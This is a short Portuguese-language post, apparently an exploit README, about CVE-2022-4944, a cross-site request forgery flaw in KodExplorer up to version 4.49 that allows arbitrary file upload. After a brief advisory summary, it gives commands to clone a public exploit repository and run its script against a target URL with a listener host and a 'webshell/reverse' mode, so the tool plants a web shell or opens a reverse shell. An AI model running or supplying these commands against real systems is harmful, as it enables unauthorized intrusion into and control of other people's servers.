
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF para Upload Arbitrário de Arquivos

Uma vulnerabilidade, classificada como problemática, foi encontrada no kalcaddle KodExplorer até a versão 4.49. Isso afeta uma parte desconhecida. A manipulação leva à falsificação de requisição entre sites (CSRF). Esta vulnerabilidade é identificada exclusivamente como CVE-2022-4944. É possível iniciar o ataque remotamente. Além disso, existe um exploit disponível. Recomenda-se atualizar o componente afetado.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode